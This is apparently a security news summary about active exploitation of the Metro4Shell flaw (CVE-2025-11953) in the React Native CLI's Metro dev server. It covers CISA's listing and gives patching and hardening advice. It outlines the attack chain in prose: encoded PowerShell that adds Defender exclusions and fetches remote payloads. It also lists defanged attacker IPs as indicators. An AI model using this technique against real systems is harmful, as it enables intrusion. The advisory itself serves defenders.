Threat actors are actively exploiting a critical remote code execution vulnerability in the popular @react-native-community/cli npm package, impacting countless mobile application developers worldwide.
The Vulnerability: CVE-2025-11953
Dubbed Metro4Shell, this critical vulnerability (CVSS 9.8) affects the Metro Development Server bundled with the React Native CLI. The flaw allows remote unauthenticated attackers to execute arbitrary operating system commands on the underlying host—turning developer workstations into attack vectors.
Security firm VulnCheck first observed exploitation on December 21, 2025, though the flaw was originally documented by JFrog in November 2025.
How the Attack Works
Attackers weaponize the vulnerability to deliver Base64-encoded PowerShell scripts that:
- Add exclusions to Microsoft Defender Antivirus for working and temp directories
- Establish raw TCP connections to attacker-controlled infrastructure
- Download and execute Rust-based payloads with anti-analysis features
The attack IPs identified include:
- 5.109.182[.]231
- 223.6.249[.]141
- 134.209.69[.]155
Why This Matters
React Native is one of the most popular cross-platform mobile development frameworks, used by companies from startups to Fortune 500 enterprises. The Metro bundler is a required component for development—meaning virtually every React Native developer is potentially exposed.
VulnCheck emphasized this isn’t experimental probing: “The delivered payloads were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.”
CISA Responds
On February 5, 2026, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-11953 to its Known Exploited Vulnerabilities (KEV) catalog. Federal Civilian Executive Branch agencies must apply fixes by February 26, 2026.
Critical Lesson
“Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.”
This attack underscores a dangerous blind spot: development environments are often left exposed with weaker security controls than production systems—yet they contain source code, credentials, and direct access to corporate networks.
Recommendations
- Update React Native CLI immediately to patched versions
- Audit network exposure—Metro dev servers should never be internet-accessible
- Monitor for IoCs—check logs for connections to the identified attack IPs
- Apply development environment hardening—treat dev workstations as attack surfaces
Read the full technical analysis: The Hacker News
